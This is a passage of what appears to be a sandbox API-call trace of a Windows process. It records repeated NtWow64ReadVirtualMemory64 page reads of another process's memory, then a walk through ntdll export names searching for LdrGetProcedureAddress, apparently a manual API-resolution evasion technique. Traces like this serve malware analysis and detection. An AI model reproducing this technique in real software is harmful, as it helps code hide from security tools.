| out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd9000, Buffer=0x7ff9, BufferSize=0x2909000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fda000, Buffer=0x7ff9, BufferSize=0x290a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdb000, Buffer=0x7ff9, BufferSize=0x290b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdc000, Buffer=0x7ff9, BufferSize=0x290c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.154] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdd000, Buffer=0x7ff9, BufferSize=0x290d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.154] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fde000, Buffer=0x7ff9, BufferSize=0x290e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.154] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdf000, Buffer=0x7ff9, BufferSize=0x290f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.154] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe0000, Buffer=0x7ff9, BufferSize=0x2910000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.157] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe1000, Buffer=0x7ff9, BufferSize=0x2911000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.157] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe2000, Buffer=0x7ff9, BufferSize=0x2912000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.157] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe3000, Buffer=0x7ff9, BufferSize=0x2913000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.157] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe4000, Buffer=0x7ff9, BufferSize=0x2914000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.157] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe5000, Buffer=0x7ff9, BufferSize=0x2915000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.157] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe6000, Buffer=0x7ff9, BufferSize=0x2916000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe7000, Buffer=0x7ff9, BufferSize=0x2917000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe8000, Buffer=0x7ff9, BufferSize=0x2918000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe9000, Buffer=0x7ff9, BufferSize=0x2919000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fea000, Buffer=0x7ff9, BufferSize=0x291a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77feb000, Buffer=0x7ff9, BufferSize=0x291b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fec000, Buffer=0x7ff9, BufferSize=0x291c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fed000, Buffer=0x7ff9, BufferSize=0x291d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fee000, Buffer=0x7ff9, BufferSize=0x291e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.158] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fef000, Buffer=0x7ff9, BufferSize=0x291f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff0000, Buffer=0x7ff9, BufferSize=0x2920000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff1000, Buffer=0x7ff9, BufferSize=0x2921000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff2000, Buffer=0x7ff9, BufferSize=0x2922000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff3000, Buffer=0x7ff9, BufferSize=0x2923000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff4000, Buffer=0x7ff9, BufferSize=0x2924000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff5000, Buffer=0x7ff9, BufferSize=0x2925000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff6000, Buffer=0x7ff9, BufferSize=0x2926000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.159] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff7000, Buffer=0x7ff9, BufferSize=0x2927000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff8000, Buffer=0x7ff9, BufferSize=0x2928000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff9000, Buffer=0x7ff9, BufferSize=0x2929000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffa000, Buffer=0x7ff9, BufferSize=0x292a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffb000, Buffer=0x7ff9, BufferSize=0x292b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffc000, Buffer=0x7ff9, BufferSize=0x292c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffd000, Buffer=0x7ff9, BufferSize=0x292d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffe000, Buffer=0x7ff9, BufferSize=0x292e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fff000, Buffer=0x7ff9, BufferSize=0x292f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.160] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78000000, Buffer=0x7ff9, BufferSize=0x2930000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78001000, Buffer=0x7ff9, BufferSize=0x2931000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78002000, Buffer=0x7ff9, BufferSize=0x2932000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78003000, Buffer=0x7ff9, BufferSize=0x2933000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78004000, Buffer=0x7ff9, BufferSize=0x2934000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78005000, Buffer=0x7ff9, BufferSize=0x2935000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78006000, Buffer=0x7ff9, BufferSize=0x2936000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78007000, Buffer=0x7ff9, BufferSize=0x2937000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78008000, Buffer=0x7ff9, BufferSize=0x2938000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.161] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78009000, Buffer=0x7ff9, BufferSize=0x2939000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800a000, Buffer=0x7ff9, BufferSize=0x293a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800b000, Buffer=0x7ff9, BufferSize=0x293b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800c000, Buffer=0x7ff9, BufferSize=0x293c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800d000, Buffer=0x7ff9, BufferSize=0x293d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800e000, Buffer=0x7ff9, BufferSize=0x293e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800f000, Buffer=0x7ff9, BufferSize=0x293f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78010000, Buffer=0x7ff9, BufferSize=0x2940000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78011000, Buffer=0x7ff9, BufferSize=0x2941000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.162] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78012000, Buffer=0x7ff9, BufferSize=0x2942000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.163] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78013000, Buffer=0x7ff9, BufferSize=0x2943000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.163] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78014000, Buffer=0x7ff9, BufferSize=0x2944000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.163] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78015000, Buffer=0x7ff9, BufferSize=0x2945000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.163] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78016000, Buffer=0x7ff9, BufferSize=0x2946000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.163] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78017000, Buffer=0x7ff9, BufferSize=0x2947000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.163] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78018000, Buffer=0x7ff9, BufferSize=0x2948000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.163] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78019000, Buffer=0x7ff9, BufferSize=0x2949000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.164] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801a000, Buffer=0x7ff9, BufferSize=0x294a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.164] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801b000, Buffer=0x7ff9, BufferSize=0x294b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.164] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801c000, Buffer=0x7ff9, BufferSize=0x294c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.164] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801d000, Buffer=0x7ff9, BufferSize=0x294d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.164] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801e000, Buffer=0x7ff9, BufferSize=0x294e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.181] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrGetProcedureAddress") returned -1 [0207.181] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgPrint", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0207.182] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] 